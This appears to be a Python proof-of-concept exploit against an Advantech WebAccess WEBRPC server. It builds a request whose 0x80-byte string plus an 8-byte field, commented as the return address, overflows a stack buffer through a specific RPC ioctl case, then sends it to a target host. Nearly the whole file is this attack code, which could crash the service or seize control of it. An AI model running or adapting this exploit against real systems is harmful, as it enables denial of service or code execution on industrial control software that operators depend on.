from bwconn import *
import struct
import sys

# Append additional options for current exploit
#CmdOptions.add_option(...)

__DOC__ = '''

'''

# define Input/Output buffer types
class IoRequest(Structure):
    _fields_ = [
        ('str_000_080',     c_ubyte * 0x80  ),  # specifies value of string to be copied onto stack based buffer with size eq 0x80 bytes.
        ('str_080_088',     c_ubyte * 0x08  ),  # specifies RET address and 4 bytes padding.
        ('term',            c_uint),            # specifies null terminator for string value.
        ]

class IoResponse(Structure):
    _fields_ = [
        ('u32_000_004',     c_uint          )
        ]


def main():

    # Obtain address and endpoint of target.
    (opts, args) = CmdOptions.parse()
    
    # Obtain address and endpoint of target.
    host, endpoint = opts.host, opts.epweb
    
    # Connect to remote Advantech WEBRPC server.
    if not RpcWebClientConnect(create_string_buffer(host), create_string_buffer(endpoint), 0):
        print('[-] WEBRPC is not available')
        return

    # Create and fill Input/Output buffers.
    ioreq = IoRequest()
    iores = IoResponse()

    # Prepare malformed string value.
    for i in range(IoRequest.str_000_080.size): ioreq.str_000_080[i] = 0x7F
    for i in range(IoRequest.str_080_088.size): ioreq.str_080_088[i] = 0x7F
    ioreq.term = 0

    # Execute request.
    result = RpcWebClientIoctl( WebIoctl.eIoctl_case_100015D6,
                                sizeof(IoRequest),
                                cast(pointer(ioreq), POINTER(c_ubyte)),
                                sizeof(IoResponse),
                                cast(pointer(iores), POINTER(c_ubyte))  )

    # Disconnect from Advantech WEBRPC server.
    result = RpcWebClientDisconnect()

if __name__ == '__main__':
    main()
    
